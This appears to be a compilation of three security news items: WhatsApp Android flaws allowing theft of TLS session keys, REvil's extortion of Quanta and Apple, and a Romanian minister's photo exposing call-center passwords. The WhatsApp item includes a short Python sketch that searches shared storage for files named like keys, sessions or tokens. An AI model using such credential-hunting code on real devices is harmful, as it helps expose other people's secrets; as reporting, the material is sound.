  13. Facebook-owned WhatsApp recently addressed two security vulnerabilities in its messaging app for Android that could have been exploited to execute malicious code remotely on the device and even exfiltrate sensitive information. The flaws take aim at devices running Android versions up to and including Android 9 by carrying out what's known as a "man-in-the-disk" attack, which makes it possible for adversaries to compromise an app by manipulating certain data being exchanged between it and the external storage.

"The two aforementioned WhatsApp vulnerabilities would have made it possible for attackers to remotely collect TLS cryptographic material for TLS 1.3 and TLS 1.2 sessions," researchers from Census Labs said. "With the TLS secrets at hand, we will demonstrate how a man-in-the-middle (MitM) attack can lead to the compromise of WhatsApp communications, to remote code execution on the victim device and to the extraction of Noise protocol keys used for end-to-end encryption in user communications."

In particular, the flaw (CVE-2021-24027) leverages Chrome's support for content providers in Android (via the "content://" URL scheme) and a same-origin policy bypass in the browser (CVE-2020-6516), thereby allowing an attacker to send a specially crafted HTML file to a victim over WhatsApp, which, when opened in the browser, executes the code contained in the HTML file.

Worse, the malicious code can be used to access any resource stored in the unprotected external storage area, including those from WhatsApp, which was found to save TLS session key details in a sub-directory, among others, and as a result expose sensitive information to any app that's provisioned to read or write from the external storage.

"All an attacker has to do is lure the victim into opening an HTML document attachment," Census Labs researcher Chariton Karamitas said. "WhatsApp will render this attachment in Chrome, over a content provider, and the attacker's Javascript code will be able to steal the stored TLS session keys."

Armed with the keys, a bad actor can then stage a man-in-the-middle attack to achieve remote code execution, or even exfiltrate the Noise protocol key pairs — which are used to operate an encrypted channel between the client and server for transport layer security (not for the messages themselves, which are encrypted using the Signal protocol) — gathered by the app for diagnostic purposes, by deliberately triggering an out-of-memory error remotely on the victim's device.

When this error is thrown, WhatsApp's debugging mechanism kicks in and uploads the encoded key pairs along with the application logs, system information, and other memory content to a dedicated crash logs server ("crashlogs.whatsapp.net"). But it's worth noting that this only occurs on devices that run a new version of the app, where "less than 10 days have elapsed since the current version's release date."

Although the debugging process is designed to catch fatal errors in the app, the idea behind the MitM exploit is to programmatically cause an exception that forces the data collection and sets off the upload, only to intercept the connection and "disclose all the sensitive information that was intended to be sent to WhatsApp's internal infrastructure."
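The "man-in-the-disk" label boils down to a simple property of pre-Android-10 external storage: it is one shared filesystem, so anything one app writes there can be enumerated and read by any other app holding the storage permission. Below is a minimal conceptual sketch of that enumeration; the /sdcard root and the filename patterns are hypothetical stand-ins for illustration, not WhatsApp's actual layout.

```python
from pathlib import Path

# Hypothetical shared external-storage root; on Android 9 and earlier,
# any app granted READ_EXTERNAL_STORAGE can traverse it freely.
SHARED_ROOT = Path("/sdcard")

# Illustrative filename fragments that would suggest session material.
SUSPICIOUS = ("key", "session", "tls", "token")

def find_exposed_secrets(root: Path):
    """Enumerate files in shared storage whose names hint at secrets.

    Nothing here is WhatsApp-specific: the point is that a co-installed
    app needs no exploit at all to read whatever other apps leave in
    shared storage, which is the essence of a man-in-the-disk attack.
    """
    for path in root.rglob("*"):
        if path.is_file() and any(s in path.name.lower() for s in SUSPICIOUS):
            yield path

if __name__ == "__main__":
    for hit in find_exposed_secrets(SHARED_ROOT):
        print("exposed:", hit)
```

Scoped storage, described next, removes exactly this capability by giving each app an isolated view of external storage.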
To defend against such attacks, Google introduced a feature called "scoped storage" in Android 10, which gives each app an isolated storage area on the device in such a way that no other app installed on the same device can directly access data saved by other apps.

The cybersecurity firm said it has no knowledge of whether the flaws have been exploited in the wild, although in the past, flaws in WhatsApp have been abused to inject spyware onto target devices and snoop on journalists and human rights activists.

WhatsApp users are recommended to update to version 2.21.4.18 to mitigate the risk associated with the flaws. When reached for a response, the company reiterated that the "keys" used to protect people's messages are not uploaded to its servers and that the crash log information does not allow it to access message contents.

"There are many more subsystems in WhatsApp which might be of great interest to an attacker," Karamitas said. "The communication with upstream servers and the E2E encryption implementation are two notable ones. Additionally, despite the fact that this work focused on WhatsApp, other popular Android messaging applications (e.g. Viber, Facebook Messenger), or even mobile games might be unwillingly exposing a similar attack surface to remote adversaries."

Source: https://thehackernews.com/2021/04/new-whatsapp-bug-couldve-let-attackers.html
  14. Prominent Apple supplier Quanta said on Wednesday that it suffered a ransomware attack at the hands of the REvil ransomware group, which is now demanding that the iPhone maker pay a ransom of $50 million to prevent sensitive files from being leaked on the dark web.

In a post shared on its deep web "Happy Blog" portal, the threat actor said it came into possession of schematics of the U.S. company's products, such as MacBooks and the Apple Watch, by infiltrating the network of the Taiwanese manufacturer, claiming it is making a ransom demand to Apple after Quanta expressed no interest in paying to recover the stolen blueprints.

"Our team is negotiating the sale of large quantities of confidential drawings and gigabytes of personal data with several major brands," the REvil operators said. "We recommend that Apple buy back the available data by May 1."

Since it was first detected in June 2019, REvil (aka Sodinokibi or Sodin) has emerged as one of the most prolific ransomware-as-a-service (RaaS) groups, and it was the first to adopt the so-called "double extortion" technique that has since been emulated by other groups to maximize their chances of making a profit. The strategy seeks to pressure victim companies into paying up, mainly by publishing a handful of files stolen from their extortion targets prior to encrypting them and threatening to release more data unless the ransom demand is met.

The main actor associated with advertising and promoting REvil on Russian-language cybercrime forums is called Unknown, aka UNKN. The ransomware is also operated as an affiliate service, wherein threat actors are recruited to spread the malware by breaching corporate network victims, while the core developers take charge of maintaining the malware and payment infrastructure. Affiliates typically receive 60% to 70% of the ransom payment.

Ransomware operators netted more than $350 million in 2020, a 311% jump from the previous year, according to blockchain analysis company Chainalysis.

The latest development also marks a new twist in the double extortion game, in which a ransomware cartel goes after a victim's customer following an unsuccessful attempt to negotiate a ransom with the primary victim.

We have reached out to Quanta for comment, and we will update the story if we hear back. However, in a statement shared with Bloomberg, the company said it worked with external IT experts in response to "cyber attacks on a small number of Quanta servers," adding that "there's no material impact on the company's business operation."

Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post.

Source: https://thehackernews.com/2021/04/hackers-threaten-to-leak-stolen-apple.html
  15. The access credentials and phone numbers visible in the images posted by minister Nicolae Ciucă were blurred by digi24.ro.

Romania's Minister of Defense, Nicolae Ciucă, published on his Facebook account a series of images from the "Nicolae Bălcescu" Land Forces Academy in Sibiu, which he had visited earlier that Tuesday. In one of the photos, however, access credentials for accounts and videoconferences are visible, along with phone numbers used by employees of a Ministry of National Defense (MApN) call center in Sibiu.

UPDATE: "The photographs were taken in the MApN Call Center and, as soon as the situation was flagged, they were removed by the communications team that manages the minister's official page. We can confirm that there were no accesses or attempted accesses. The passwords were changed immediately," the Ministry of National Defense said.

"Together with my fellow members of parliament from the defense committees, I visited today, in Sibiu, the "Nicolae Bălcescu" Land Forces Academy, one of the most modern institutions of university education in Romania. The first visit to MApN units by members of the defense committees of the Senate and the Chamber of Deputies was to a higher-education institution, in order to see the values of the system for training, educating and developing military leadership, where officers of the largest service branch of the Romanian Armed Forces are trained. Together with the Chief of the Defence Staff, Lieutenant General Daniel Petrescu, we presented to the parliamentarians the missions, priorities and procurement programs of the Romanian Armed Forces, both ongoing and prospective. The chairs of the two committees, Senator Nicoleta Pauliuc and Deputy Constantin Șovăială, as well as the parliamentarians in the delegation, expressed their willingness to take part in more such activities in the future, which serve to deepen the relationship between the defense committees and the Ministry of National Defense and to develop fruitful cooperation in the field of security and defense. I would note that the activity was adapted to the current pandemic context, with all distancing and sanitary protection measures observed," reads the minister's post, accompanied by images from inside the Land Forces Academy building in Sibiu.

The login credentials displayed on a whiteboard belong to the people working in the Army's call center in Sibiu. A few hours after the image was posted and picked up by the media, the photo was taken down. By then, however, it had gone viral and was circulating on social media.

Source: https://www.digi24.ro/stiri/actualitate/social/gafa-a-ministrului-apararii-nicolae-ciuca-a-postat-din-greseala-pe-facebook-parole-de-acces-ale-unui-call-center-al-armatei-1473031

Shit happens. 🤣